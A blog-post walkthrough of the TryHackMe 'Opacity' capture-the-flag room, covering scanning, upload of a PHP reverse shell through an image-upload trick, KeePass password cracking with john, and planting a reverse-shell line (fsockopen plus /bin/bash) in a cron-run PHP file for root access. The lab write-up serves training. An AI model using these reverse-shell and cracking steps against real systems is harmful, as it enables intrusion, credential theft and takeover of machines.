Open in app

Sign in

Write

Sign in

Opacity — TryHackMe — WriteUp

GrimTheRipper
4 min readMar 23, 2025

--

  • Difficulty : Medium

Objectives :

Flag 1 : What is the user flag?

Flag 2 : What is the root flag?

Flag 1

command: nmap -sC -sV [Target IP]

We open web browser http://[Target IP]/ and found noting.

We need to find another PATH.

We use Gobuster.

command: gobuster dir -u http://[Target IP] -w /usr/share/worldlists/dirb/big.txt

We will try to use reverse shell, You need to edit the original code to specify where you want the reverse shell to return to. Edit the following line of php-reverse-shell.php.

$ip = ‘127.0.0.1’; // CHANGE THIS

Change $ip to your ip and then upload file by use:

command: pyton3 -m http.server 8080

In External URL use this format: http://[Target IP]:8080/php-reverse-shell.php .png and Then Upload Image

After uploading is complete, go to the Kali page, then open nc to listen on the port as set.

Then copy Image Link and open in other tap of browser.

Great! Now all we need to do is wait for the reverse shell.

We are in the target mechine, we try to go to /home to see other User and we see sysadmin.

We are go in sysadmin use ls and see file dataset.kdbx and use python3 -m http.server 8080

We go to kali and download dataset.kdbx

command: wget http://[Target IP]/dataset.kdbx

command: keepass2john dataset.kdbx > keepass.hash

command: john keepass.hash — wordlist=/usr/share/wordlists/rockyou.txt

Then open KeepassXC open with file dataset.kdbx and you use password that we get from john you will see password of sysadmin.

Then we use SSH to get in to mechine with use sysadmin .

command: ssh sysadmin@[Target IP]

and use password that get from KeepassXC

When we get in to this sysadmin let get the first flag.

command: cat local.txt

Flag 2

After get first flag, you will see folder /lib get in to /lib

Now we try to copy file back.inc.php for modified.

code: $sock=fsockopen(“[Your IP]”,[port]);shell_exec(“/bin/bash <&3 >&3 2>&3”);

Remove the original file to replace it with the modified file.

Then replace it with the modified file.

Now we go to kali and use nc to wait for script.php to run, triggering backup.inc.php to spawn the reverse shell.

Now you can capture the second flag.

--

--

GrimTheRipper
GrimTheRipper

Written by GrimTheRipper

25 Followers
7 Following

You get the best out of others when you give the best of yourself

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech